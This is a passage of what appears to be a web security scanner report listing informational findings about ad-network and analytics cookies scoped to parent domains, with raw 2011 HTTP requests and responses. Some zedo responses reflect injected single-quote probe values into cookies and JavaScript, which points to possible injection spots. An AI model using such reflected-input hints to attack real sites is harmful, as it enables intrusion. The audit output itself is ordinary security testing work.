CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Thu, 06-Sep-2012 12:47:51 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Tue, 16-Aug-2016 12:47:51 GMT; Path=/
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:47:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

10.7. http://c.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=594085&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.popsugar.com/community/welcome&t=Welcome&java=1&security=defbf778&sc_random=0.8725620578043163&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831680.0; expires=Sat, 10-Sep-2016 12:48:00 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.8. http://c13.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c13.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=1345764&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.nowpublic.com/&t=NowPublic.com%20%7C%20The%20News%20is%20NowPublic&java=1&security=26324a10&sc_random=0.533788861008361 HTTP/1.1
Host: c13.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0-1345764.1315831702.0; expires=Sat, 10-Sep-2016 12:48:22 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.9. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=14&q=&$=&s=2&z=0.5840262724086642 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0; PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3944d'$1545:1a0a560b687152eaa6ee3ef9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:1545,8,0:0,8,9:1545,0,9:305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:29:27:1:1:1:1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2470020B826,110235,110236|1,1#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:53 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=165
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:48:53 GMT
Content-Length: 4602
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='1a0a560b687
...[SNIP]...

10.10. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:31 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=153
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:31 GMT
Content-Length: 7450
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...

10.11. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7040/7039/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=1638&z=0.628017297713086 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 507
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7040,15:305,7038,15:305,7038,0:0,7038,15:305,0,15:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:29:1:1:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7040,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=146
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:37 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1638;var zzPat='1a0a56
...[SNIP]...

10.12. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 407
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:305,0,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=152
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:32 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...

10.13. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 420
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:5406e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:2:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=85
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:38 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='5406e''
...[SNIP]...

10.14. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=9&q=&$=&s=2&z=0.3701211323495954 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=3:3:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2470080B826,110235|0,1#0,24;expires=Wed, 12 Oct 2011 13:03:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:3:3:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 12 Sep 2011 13:06:33 GMT
Date: Mon, 12 Sep 2011 13:03:56 GMT
Content-Length: 4557
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCust
...[SNIP]...

10.15. http://c7.zedo.com/utils/ecSet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1201513Za1013066Zc305007038%2C305007038Zs608Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6687
Date: Mon, 12 Sep 2011 12:48:33 GMT
Connection: close



10.16. http://cm.npc-morris.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.css&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF0dXZ2cAN%2bpN%2bAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:41 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4627


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

10.17. http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://counters.gigya.com
Path:   /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif HTTP/1.1
Host: counters.gigya.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ucid=RFq8Ln1vPSaBPMmq4LEJ0w==; _mkto_trk=id:672-YBF-078&token:_mch-gigya.com-1314893715569-60156; __utma=246645010.642220752.1314893716.1314893716.1314893716.1; __utmz=246645010.1314893716.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 12:48:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web204
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: close
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: GF_1640683793=http://www.observer.com/; path=/
Set-Cookie: GF_1640683793=http://www.observer.com/; domain=gigya.com; path=/
